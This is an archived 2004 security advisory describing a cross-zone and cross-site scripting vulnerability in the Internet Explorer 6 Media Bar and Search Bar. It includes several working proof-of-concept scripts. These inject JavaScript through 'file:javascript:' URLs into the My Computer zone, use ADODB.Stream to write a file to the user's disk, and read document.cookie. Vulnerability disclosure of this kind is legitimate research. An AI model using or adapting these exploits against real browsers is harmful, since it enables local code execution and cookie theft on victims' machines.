TUCoPS :: Browsers :: hack3695.htm

Internet Explorer - new Cross Zone/Site Scripting vuln
New Internet Explorer Cross Zone/Site Scripting Vulnerability





#########################################################################



Advisory Name : Internet Explorer Cross Zone/Site Scripting Vulnerability

 Release Date : Mar 3,2004 

  Application : Microsoft Internet Explorer

    Tested On : MS-IE 6.0(sp1)

   Vendor URL : http://www.microsoft.com/ie 

       Author : Cheng Peng Su(apple_soup_at_msn.com)



#########################################################################





[Proof of Concept]

   The code below is used for loading a URL into the HTML content area of the Media Bar

   window.open("http://www.google.com/","_media") 

   And javascript also can be injected:

   window.open("javascript:alert(location.href)","_media")

   in my computer,the code above will show me a MsgBox says 

        'res://C:\WINDOWS\SYSTEM\BROWSELC.DLL/mbLoading.htm'

   it suggests you that it's executed in My Computer Zone.

   We can also inject a code to the Media Bar which has connected to a website.

   As Media Bar ,Search Bar has the same vuln.

   

[Exploit]

   !YOU CAN FIND THE DOCUMENT AT

   !http://www.freewebs.com/applesoup/CrossBar/document.txt 

  

   The code will use 'file:javascript:[script]' vuln which posted months ago.Maybe Microsoft

   has noticed the leak here,so i can't only use javascript-protocol in the code, and  script-tag

   is filtered out ,so i have to inject the script into img-tag.

   

   I. In Media Bar

   1 . Cross Zone Scripting Exploit

   ---------------------------CrossZone.htm---------------------------

   <script>

   

   // '\\42' -> '\42' -> ' " '

   img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'

   + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'

   + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';



   inject_html="";

   

   window.open('file:javascript:document.write("' + inject_html + '")','_media');



   </script>

   -------------------------------End---------------------------------

   

   

   2 . Cross Site Scripting Exploit

   ---------------------------CrossSite.htm---------------------------

   <script>



   window.open("http://www.google.com/","_media") 

   setTimeout(function(){

   window.open("file:javascript:alert(document.cookie);","_media")

   },5000);

   

   </script>

   -------------------------------End---------------------------------

   

   

   

   

   II. In Search Bar

   1 . Cross Zone Scripting Exploit

   ---------------------------CrossZone.htm---------------------------

   <script>

   window.open("http://wrong_site_add/","_search") //To load "Friendly HTTP error messages" page

                                                   // cause it's in My Computer Zone.

   setTimeout(function(){

   

      // '\\42' -> '\42' -> ' " '

      img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'

      + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'

      + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';



      inject_html="";

   

      window.open('file:javascript:document.write("' + inject_html + '")','_search');



   },5000);

   

   </script>

   -------------------------------End---------------------------------

      

   

   2 . Cross Site Scripting Exploit

   ---------------------------CrossSite.htm---------------------------

   <script>



   window.open("http://www.google.com/","_search") 

   setTimeout(function(){

   window.open("file:javascript:alert(document.cookie);","_search")

   },5000);

   

   </script>

   -------------------------------End---------------------------------



[Demo]

   Harmless demo:

   http://www.freewebs.com/applesoup/CrossBar/CrossSiteMB.htm 

   http://www.freewebs.com/applesoup/CrossBar/CrossZoneMB.htm 

   http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm 

   http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm 

   

[Contact]

Cheng Peng Su

Class 1,Senior 2,high school attached to Wuhan University

Wuhan,Hubei,China(430072)

apple_soup_at_msn.com


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH